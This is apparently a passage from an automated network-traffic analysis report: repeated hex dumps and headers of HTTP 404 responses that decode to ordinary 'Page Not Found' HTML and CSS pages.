2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:21:56 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:22:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:22:05 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:22:08 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:22:11 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 27 May 2024 10:22:39 GMTserver: Apache / ZoneOSlast-modified: Mon, 06 Nov 2023 23:06:18 GMTetag: "1d7b-60983e6d29793"accept-ranges: bytescontent-length: 7547connection: closecontent-type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 38 32 45 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 2e 63 75 72 72 65 6e 74 2d 75 72 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 34 45 34 45 34 45 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 39 35 39 35 39 35 3b 0a 0a 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 72 65 6d 3b 0a 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 33 43 33 43 43 3b 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 46 43 46 43 46 43 3b 0a 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 43 46 43 46 43 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 7d 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 27 May 2024 10:22:42 GMTserver: Apache / ZoneOSlast-modified: Mon, 06 Nov 2023 23:06:18 GMTetag: "1d7b-60983e6d29793"accept-ranges: bytescontent-length: 7547connection: closecontent-type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 38 32 45 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 2e 63 75 72 72 65 6e 74 2d 75 72 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 34 45 34 45 34 45 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 39 35 39 35 39 35 3b 0a 0a 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 72 65 6d 3b 0a 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 33 43 33 43 43 3b 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 46 43 46 43 46 43 3b 0a 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 43 46 43 46 43 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 7d 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 27 May 2024 10:22:44 GMTserver: Apache / ZoneOSlast-modified: Mon, 06 Nov 2023 23:06:18 GMTetag: "1d7b-60983e6d29793"accept-ranges: bytescontent-length: 7547connection: closecontent-type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 38 32 45 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 2e 63 75 72 72 65 6e 74 2d 75 72 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 34 45 34 45 34 45 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 39 35 39 35 39 35 3b 0a 0a 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 72 65 6d 3b 0a 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 33 43 33 43 43 3b 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 46 43 46 43 46 43 3b 0a 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 43 46 43 46 43 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 7d 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 27 May 2024 10:22:47 GMTserver: Apache / ZoneOSlast-modified: Mon, 06 Nov 2023 23:06:18 GMTetag: "1d7b-60983e6d29793"accept-ranges: bytescontent-length: 7547connection: closecontent-type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 38 32 45 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 2e 63 75 72 72 65 6e 74 2d 75 72 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 34 45 34 45 34 45 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 39 35 39 35 39 35 3b 0a 0a 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 72 65 6d 3b 0a 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 33 43 33 43 43 3b 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 46 43 46 43 46 43 3b 0a 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 43 46 43 46 43 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 7d 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35
